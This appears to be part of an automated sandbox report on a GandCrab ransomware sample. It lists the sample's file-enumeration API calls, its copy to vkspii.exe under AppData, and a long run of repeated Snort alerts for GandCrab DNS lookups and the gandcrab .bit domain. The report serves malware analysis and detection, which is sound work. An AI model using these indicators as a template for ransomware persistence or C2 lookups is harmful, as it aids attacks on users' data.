                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeFile opened: a:Jump to behavior
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,1_2_004066F0
                    Source: C:\Users\user\Desktop\9gkAKTWOXp.exeCode function: 1_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,1_2_004064A0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,13_2_004066F0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 13_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,13_2_004064A0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,21_2_004066F0
                    Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exeCode function: 21_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,21_2_004064A0

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51141 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51142 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51143 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:51144 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:52957 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:52958 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:52959 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:52960 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60584 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60585 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60586 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:60587 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57136 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57137 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57138 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57139 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:56044 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:56045 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:56046 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:56047 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59638 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59639 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59640 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59641 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55640 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55641 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55642 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:55643 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57706 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57707 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57708 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57709 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65322 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65323 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65324 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65325 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60769 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60770 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60771 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60772 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65109 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65110 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65111 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65112 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53850 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53851 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53852 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53853 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57573 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57574 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57575 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:57576 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53307 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53308 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53309 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53310 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59435 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59436 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59437 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59438 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53846 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53847 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53848 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53849 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53468 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53469 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53470 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:53471 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53625 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53626 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53627 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:53628 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61418 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61419 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61420 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61421 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65198 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65199 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65200 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65201 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59583 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59584 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59585 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59586 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53051 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53052 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53053 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53054 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60090 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60091 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60092 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:60093 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63564 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63565 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63566 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:63567 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53430 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53431 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53432 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53433 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65513 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65514 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65515 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:65516 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59822 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59823 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59824 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:59825 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64597 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64598 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64599 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64600 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64825 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64826 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64827 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64828 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51994 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51995 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51996 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:51997 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58121 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58122 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58123 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:58124 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49168 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49169 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49170 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49171 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58303 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58304 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58305 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:58306 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63448 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63449 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63450 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:63451 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49876 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49877 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49878 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:49879 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65387 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65388 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65389 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:65390 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54155 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54156 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54157 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:54158 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64604 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64605 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64606 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64607 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50786 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50787 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50788 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50789 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64123 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64124 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64125 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:64126 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64969 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64970 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64971 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:64972 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49203 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49204 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49205 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:49206 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60474 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60475 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60476 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:60477 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59376 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59377 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59378 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:59379 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56618 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56619 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56620 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:56621 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61186 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61187 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61188 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:61189 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57389 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57390 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57391 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.3:57392 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50230 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50231 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50232 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.3:50233 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53271 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53272 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.3:53273 -> 8.8.8.8:53
